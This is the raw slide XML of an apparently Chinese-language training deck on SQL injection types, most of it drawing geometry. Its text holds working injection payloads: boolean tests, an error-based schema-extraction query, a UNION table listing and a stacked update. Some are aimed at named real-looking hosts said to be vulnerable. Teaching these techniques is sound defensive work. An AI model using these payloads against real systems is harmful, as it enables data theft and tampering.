                      <a:pt x="131" y="216"/>
                      <a:pt x="131" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="216"/>
                      <a:pt x="132" y="215"/>
                      <a:pt x="132" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="214"/>
                      <a:pt x="132" y="203"/>
                      <a:pt x="132" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="177"/>
                      <a:pt x="140" y="174"/>
                      <a:pt x="149" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="192"/>
                      <a:pt x="166" y="200"/>
                      <a:pt x="166" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="201"/>
                      <a:pt x="167" y="201"/>
                      <a:pt x="167" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="200"/>
                      <a:pt x="175" y="193"/>
                      <a:pt x="184" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="175"/>
                      <a:pt x="200" y="168"/>
                      <a:pt x="201" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="167"/>
                      <a:pt x="201" y="167"/>
                      <a:pt x="201" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="200" y="166"/>
                      <a:pt x="193" y="158"/>
                      <a:pt x="183" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="140"/>
                      <a:pt x="177" y="132"/>
                      <a:pt x="190" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="203" y="132"/>
                      <a:pt x="215" y="132"/>
                      <a:pt x="215" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="215" y="132"/>
                      <a:pt x="216" y="132"/>
                      <a:pt x="216" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="131"/>
                      <a:pt x="216" y="120"/>
                      <a:pt x="216" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="95"/>
                      <a:pt x="216" y="85"/>
                      <a:pt x="216" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="84"/>
                      <a:pt x="215" y="83"/>
                      <a:pt x="215" y="83"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="109" y="143"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="143"/>
                      <a:pt x="73" y="127"/>
                      <a:pt x="73" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="87"/>
                      <a:pt x="89" y="71"/>
                      <a:pt x="109" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="71"/>
                      <a:pt x="146" y="87"/>
                      <a:pt x="146" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="127"/>
                      <a:pt x="129" y="143"/>
                      <a:pt x="109" y="14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5" name="Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5834063" y="5959475"/>
                <a:ext cx="76200" cy="74612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 107 w 108"/>
                  <a:gd name="T1" fmla="*/ 41 h 107"/>
                  <a:gd name="T2" fmla="*/ 95 w 108"/>
                  <a:gd name="T3" fmla="*/ 41 h 107"/>
                  <a:gd name="T4" fmla="*/ 92 w 108"/>
                  <a:gd name="T5" fmla="*/ 33 h 107"/>
                  <a:gd name="T6" fmla="*/ 100 w 108"/>
                  <a:gd name="T7" fmla="*/ 24 h 107"/>
                  <a:gd name="T8" fmla="*/ 100 w 108"/>
                  <a:gd name="T9" fmla="*/ 24 h 107"/>
                  <a:gd name="T10" fmla="*/ 92 w 108"/>
                  <a:gd name="T11" fmla="*/ 15 h 107"/>
                  <a:gd name="T12" fmla="*/ 84 w 108"/>
                  <a:gd name="T13" fmla="*/ 7 h 107"/>
                  <a:gd name="T14" fmla="*/ 83 w 108"/>
                  <a:gd name="T15" fmla="*/ 7 h 107"/>
                  <a:gd name="T16" fmla="*/ 74 w 108"/>
                  <a:gd name="T17" fmla="*/ 16 h 107"/>
                  <a:gd name="T18" fmla="*/ 66 w 108"/>
                  <a:gd name="T19" fmla="*/ 12 h 107"/>
                  <a:gd name="T20" fmla="*/ 66 w 108"/>
                  <a:gd name="T21" fmla="*/ 0 h 107"/>
                  <a:gd name="T22" fmla="*/ 66 w 108"/>
                  <a:gd name="T23" fmla="*/ 0 h 107"/>
                  <a:gd name="T24" fmla="*/ 54 w 108"/>
                  <a:gd name="T25" fmla="*/ 0 h 107"/>
                  <a:gd name="T26" fmla="*/ 42 w 108"/>
                  <a:gd name="T27" fmla="*/ 0 h 107"/>
                  <a:gd name="T28" fmla="*/ 42 w 108"/>
                  <a:gd name="T29" fmla="*/ 0 h 107"/>
                  <a:gd name="T30" fmla="*/ 42 w 108"/>
                  <a:gd name="T31" fmla="*/ 12 h 107"/>
                  <a:gd name="T32" fmla="*/ 33 w 108"/>
                  <a:gd name="T33" fmla="*/ 16 h 107"/>
                  <a:gd name="T34" fmla="*/ 25 w 108"/>
                  <a:gd name="T35" fmla="*/ 7 h 107"/>
                  <a:gd name="T36" fmla="*/ 24 w 108"/>
                  <a:gd name="T37" fmla="*/ 7 h 107"/>
                  <a:gd name="T38" fmla="*/ 16 w 108"/>
                  <a:gd name="T39" fmla="*/ 15 h 107"/>
                  <a:gd name="T40" fmla="*/ 7 w 108"/>
                  <a:gd name="T41" fmla="*/ 24 h 107"/>
                  <a:gd name="T42" fmla="*/ 7 w 108"/>
                  <a:gd name="T43" fmla="*/ 24 h 107"/>
                  <a:gd name="T44" fmla="*/ 16 w 108"/>
                  <a:gd name="T45" fmla="*/ 33 h 107"/>
                  <a:gd name="T46" fmla="*/ 13 w 108"/>
                  <a:gd name="T47" fmla="*/ 41 h 107"/>
                  <a:gd name="T48" fmla="*/ 0 w 108"/>
                  <a:gd name="T49" fmla="*/ 41 h 107"/>
                  <a:gd name="T50" fmla="*/ 0 w 108"/>
                  <a:gd name="T51" fmla="*/ 42 h 107"/>
                  <a:gd name="T52" fmla="*/ 0 w 108"/>
                  <a:gd name="T53" fmla="*/ 54 h 107"/>
                  <a:gd name="T54" fmla="*/ 0 w 108"/>
                  <a:gd name="T55" fmla="*/ 65 h 107"/>
                  <a:gd name="T56" fmla="*/ 0 w 108"/>
                  <a:gd name="T57" fmla="*/ 66 h 107"/>
                  <a:gd name="T58" fmla="*/ 13 w 108"/>
                  <a:gd name="T59" fmla="*/ 66 h 107"/>
                  <a:gd name="T60" fmla="*/ 16 w 108"/>
                  <a:gd name="T61" fmla="*/ 74 h 107"/>
                  <a:gd name="T62" fmla="*/ 7 w 108"/>
                  <a:gd name="T63" fmla="*/ 83 h 107"/>
                  <a:gd name="T64" fmla="*/ 7 w 108"/>
                  <a:gd name="T65" fmla="*/ 83 h 107"/>
                  <a:gd name="T66" fmla="*/ 16 w 108"/>
                  <a:gd name="T67" fmla="*/ 92 h 107"/>
                  <a:gd name="T68" fmla="*/ 24 w 108"/>
                  <a:gd name="T69" fmla="*/ 100 h 107"/>
                  <a:gd name="T70" fmla="*/ 25 w 108"/>
                  <a:gd name="T71" fmla="*/ 100 h 107"/>
                  <a:gd name="T72" fmla="*/ 33 w 108"/>
                  <a:gd name="T73" fmla="*/ 91 h 107"/>
                  <a:gd name="T74" fmla="*/ 42 w 108"/>
                  <a:gd name="T75" fmla="*/ 95 h 107"/>
                  <a:gd name="T76" fmla="*/ 42 w 108"/>
                  <a:gd name="T77" fmla="*/ 107 h 107"/>
                  <a:gd name="T78" fmla="*/ 42 w 108"/>
                  <a:gd name="T79" fmla="*/ 107 h 107"/>
                  <a:gd name="T80" fmla="*/ 54 w 108"/>
                  <a:gd name="T81" fmla="*/ 107 h 107"/>
                  <a:gd name="T82" fmla="*/ 66 w 108"/>
                  <a:gd name="T83" fmla="*/ 107 h 107"/>
                  <a:gd name="T84" fmla="*/ 66 w 108"/>
                  <a:gd name="T85" fmla="*/ 107 h 107"/>
                  <a:gd name="T86" fmla="*/ 66 w 108"/>
                  <a:gd name="T87" fmla="*/ 95 h 107"/>
                  <a:gd name="T88" fmla="*/ 74 w 108"/>
                  <a:gd name="T89" fmla="*/ 91 h 107"/>
                  <a:gd name="T90" fmla="*/ 83 w 108"/>
                  <a:gd name="T91" fmla="*/ 100 h 107"/>
                  <a:gd name="T92" fmla="*/ 84 w 108"/>
                  <a:gd name="T93" fmla="*/ 100 h 107"/>
                  <a:gd name="T94" fmla="*/ 92 w 108"/>
                  <a:gd name="T95" fmla="*/ 92 h 107"/>
                  <a:gd name="T96" fmla="*/ 100 w 108"/>
                  <a:gd name="T97" fmla="*/ 83 h 107"/>
                  <a:gd name="T98" fmla="*/ 100 w 108"/>
                  <a:gd name="T99" fmla="*/ 83 h 107"/>
                  <a:gd name="T100" fmla="*/ 92 w 108"/>
                  <a:gd name="T101" fmla="*/ 74 h 107"/>
                  <a:gd name="T102" fmla="*/ 95 w 108"/>
                  <a:gd name="T103" fmla="*/ 66 h 107"/>
                  <a:gd name="T104" fmla="*/ 107 w 108"/>
                  <a:gd name="T105" fmla="*/ 66 h 107"/>
                  <a:gd name="T106" fmla="*/ 108 w 108"/>
                  <a:gd name="T107" fmla="*/ 65 h 107"/>
                  <a:gd name="T108" fmla="*/ 108 w 108"/>
                  <a:gd name="T109" fmla="*/ 54 h 107"/>
                  <a:gd name="T110" fmla="*/ 108 w 108"/>
                  <a:gd name="T111" fmla="*/ 42 h 107"/>
                  <a:gd name="T112" fmla="*/ 107 w 108"/>
                  <a:gd name="T113" fmla="*/ 41 h 107"/>
                  <a:gd name="T114" fmla="*/ 67 w 108"/>
                  <a:gd name="T115" fmla="*/ 67 h 107"/>
                  <a:gd name="T116" fmla="*/ 42 w 108"/>
                  <a:gd name="T117" fmla="*/ 67 h 107"/>
                  <a:gd name="T118" fmla="*/ 42 w 108"/>
                  <a:gd name="T119" fmla="*/ 41 h 107"/>
                  <a:gd name="T120" fmla="*/ 67 w 108"/>
                  <a:gd name="T121" fmla="*/ 41 h 107"/>
                  <a:gd name="T122" fmla="*/ 67 w 108"/>
                  <a:gd name="T123" fmla="*/ 6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8" h="107">
                    <a:moveTo>
                      <a:pt x="107" y="41"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="41"/>
                      <a:pt x="102" y="41"/>
                      <a:pt x="95" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="41"/>
                      <a:pt x="87" y="38"/>
                      <a:pt x="92" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="28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96" y="20"/>
                      <a:pt x="92" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="11"/>
                      <a:pt x="84" y="7"/>
                      <a:pt x="84" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="7"/>
                      <a:pt x="83" y="7"/>
                      <a:pt x="83" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="7"/>
                      <a:pt x="79" y="11"/>
                      <a:pt x="74" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="20"/>
                      <a:pt x="66" y="19"/>
                      <a:pt x="66" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="6"/>
                      <a:pt x="66" y="0"/>
                      <a:pt x="66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5" y="0"/>
                      <a:pt x="60" y="0"/>
                      <a:pt x="54" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48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6"/>
                      <a:pt x="42" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="19"/>
                      <a:pt x="38" y="20"/>
                      <a:pt x="33" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="11"/>
                      <a:pt x="25" y="7"/>
                      <a:pt x="25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0" y="11"/>
                      <a:pt x="16" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="20"/>
                      <a:pt x="8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11" y="28"/>
                      <a:pt x="16" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="38"/>
                      <a:pt x="19" y="41"/>
                      <a:pt x="13" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="41"/>
                      <a:pt x="1" y="41"/>
                      <a:pt x="0" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="41"/>
                      <a:pt x="0" y="42"/>
                      <a:pt x="0" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="42"/>
                      <a:pt x="0" y="47"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="60"/>
                      <a:pt x="0" y="65"/>
                      <a:pt x="0" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="65"/>
                      <a:pt x="0" y="66"/>
                      <a:pt x="0" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="66"/>
                      <a:pt x="6" y="66"/>
                      <a:pt x="13" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="66"/>
                      <a:pt x="21" y="69"/>
                      <a:pt x="16" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="79"/>
                      <a:pt x="8" y="83"/>
                      <a:pt x="7" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="83"/>
                      <a:pt x="7" y="83"/>
                      <a:pt x="7" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="83"/>
                      <a:pt x="11" y="87"/>
                      <a:pt x="16" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="96"/>
                      <a:pt x="24" y="100"/>
                      <a:pt x="24" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="100"/>
                      <a:pt x="24" y="100"/>
                      <a:pt x="25" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="100"/>
                      <a:pt x="29" y="96"/>
                      <a:pt x="33" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="87"/>
                      <a:pt x="42" y="88"/>
                      <a:pt x="42" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="101"/>
                      <a:pt x="42" y="107"/>
                      <a:pt x="42" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="107"/>
                      <a:pt x="42" y="107"/>
                      <a:pt x="42" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="107"/>
                      <a:pt x="48" y="107"/>
                      <a:pt x="54" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="107"/>
                      <a:pt x="65" y="107"/>
                      <a:pt x="66" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="107"/>
                      <a:pt x="66" y="107"/>
                      <a:pt x="66" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="107"/>
                      <a:pt x="66" y="101"/>
                      <a:pt x="66" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="88"/>
                      <a:pt x="70" y="87"/>
                      <a:pt x="74" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="96"/>
                      <a:pt x="83" y="100"/>
                      <a:pt x="83" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="100"/>
                      <a:pt x="84" y="100"/>
                      <a:pt x="84" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="100"/>
                      <a:pt x="88" y="96"/>
                      <a:pt x="92" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="87"/>
                      <a:pt x="100" y="83"/>
                      <a:pt x="100" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="83"/>
                      <a:pt x="100" y="83"/>
                      <a:pt x="100" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="83"/>
                      <a:pt x="96" y="79"/>
                      <a:pt x="92" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="69"/>
                      <a:pt x="88" y="66"/>
                      <a:pt x="95" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="66"/>
                      <a:pt x="107" y="66"/>
                      <a:pt x="107" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="66"/>
                      <a:pt x="108" y="65"/>
                      <a:pt x="108" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="65"/>
                      <a:pt x="108" y="60"/>
                      <a:pt x="108" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="47"/>
                      <a:pt x="108" y="42"/>
                      <a:pt x="108" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="42"/>
                      <a:pt x="108" y="41"/>
                      <a:pt x="107" y="41"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="67" y="67"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="74"/>
                      <a:pt x="49" y="74"/>
                      <a:pt x="42" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="60"/>
                      <a:pt x="35" y="48"/>
                      <a:pt x="42" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="34"/>
                      <a:pt x="60" y="34"/>
                      <a:pt x="67" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="48"/>
                      <a:pt x="75" y="60"/>
                      <a:pt x="67" y="6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56" name="椭圆 55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4576741" y="3402931"/>
              <a:ext cx="624974" cy="624974"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="46" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="48" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="50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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="576461" y="1126372"/>
            <a:ext cx="7066280" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="6230272" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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0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1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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6" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536829" y="3196863"/>
              <a:ext cx="5519793" cy="557719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Boolean-based blind SQL injection（布尔型注入）</a:t>
              </a:r>
              <a:endPara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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="da-DK" altLang="zh-CN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296670" y="1452245"/>
            <a:ext cx="7183755" cy="476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SELECT title, description, body FROM items WHERE ID = 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr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and 1=2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SELECT title, description, body FROM items WHERE ID = 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr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and 1=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  <a:p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实例：</a:t>
            </a:r>
            <a:r>
              <a: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购物圈后台管理系统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多个接口</a:t>
            </a:r>
            <a:r>
              <a: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存在SQL注入漏洞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http://wqadmin.jd.com/content_center/source/php/cgi/QueryContentChannel.php?callback=QueryChannel&amp;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i_channel_id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=10000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AND 8355=8355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&amp;_=1542786907698</a:t>
            </a:r>
          </a:p>
          <a:p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http://wqadmin.jd.com/shopgroup/source/php/cgi/GetTag.php?callback=GetTag&amp;page=1&amp;pageSize=50&amp;i_channel_id=10000&amp;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i_group_id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=2   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AND 9222=9222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&amp;_=1542787191022  </a:t>
            </a:r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504190" y="503555"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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注入类型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2395" y="1948815"/>
            <a:ext cx="6114415" cy="26758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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="576461" y="1332803"/>
            <a:ext cx="4406705" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="3885350" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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000" dirty="0" err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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3196940"/>
              <a:ext cx="3175000" cy="557828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Error-based SQL injection（报错型注入）</a:t>
              </a:r>
              <a:endParaRPr lang="da-DK" altLang="zh-CN" sz="1400" kern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310640" y="1852930"/>
            <a:ext cx="9075420" cy="3723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如果页面能够输出SQL报错信息，则可以从报错信息中获得想要的信息。</a:t>
            </a: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典型的就是利用group by的重复条目错误：</a:t>
            </a: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select * from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table_name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where id=1057 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AND (SELECT 7506 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x7178786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a);</a:t>
            </a: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在抛出的SQL错误中会包含这样的信息： ERROR 1062 (23000): Duplicate entry 'qzpzq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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test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qxxbq1' for key 'group_key'，其中qzpzq和qxxbq这两个字符串包住了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test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（即数据库名）。</a:t>
            </a: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结论：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不要把报错信息返回给用户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，攻击者可以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从报错信息中获得想要的信息。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504190" y="503555"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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注入类型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2395" y="4134485"/>
            <a:ext cx="8573135" cy="8432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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="576461" y="1189293"/>
            <a:ext cx="6508750" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="5738703" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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000" dirty="0" err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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536829" y="3196863"/>
              <a:ext cx="5028224" cy="557719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UNION query SQL injection（可联合查询注入）</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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310640" y="1781175"/>
            <a:ext cx="9594850" cy="200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最快捷的方法，通过UNION查询获取到所有想要的数据，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前提是请求返回后能输出SQL执行后查询到的所有内容。</a:t>
            </a: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例如：查看表名</a:t>
            </a:r>
          </a:p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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr 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117.41.229.122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8003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/?id=1 and 1=2 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UNION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select 1,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table_name from information_schema.tables</a:t>
            </a:r>
          </a:p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where table_schema=database()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504190" y="503555"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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注入类型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2395" y="3402330"/>
            <a:ext cx="5413375" cy="28130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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="576461" y="1404558"/>
            <a:ext cx="6487795" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="5720227" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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000" dirty="0" err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4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536829" y="3196863"/>
              <a:ext cx="5009748" cy="557719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Stacked queries SQL injection（可多语句查询注入）</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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310640" y="1996440"/>
            <a:ext cx="6914515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即能够执行多条查询语句，非常危险，因为这意味着能够对数据库直接做更新操作。</a:t>
            </a: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如下SQL注入：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http://hello.com/view?id=1;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update t1 set content = 'aaaaaaaaa'</a:t>
            </a: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第二次请求 http://hello.com/view?id=1时，会发现所有的内容都被设置为aaaaaaaaa了。</a:t>
            </a:r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504190" y="503555"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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注入类型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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="576461" y="1189293"/>
            <a:ext cx="6288405" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="5544427" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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000" dirty="0" err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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536829" y="3196863"/>
              <a:ext cx="4833948" cy="557719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lang="zh-CN" altLang="en-US" sz="14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Time-based blind SQL injection（基于时间延迟注入）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310640" y="1709420"/>
            <a:ext cx="8563610" cy="2891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页面不返回错误信息，不输出UNION注入所查出来的泄露的信息。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类似搜索这类请求，布尔注入也无能为力，因为搜索返回空也属于正常的，这时就得采用基于时间的注入了，即判断请求响应的时间。</a:t>
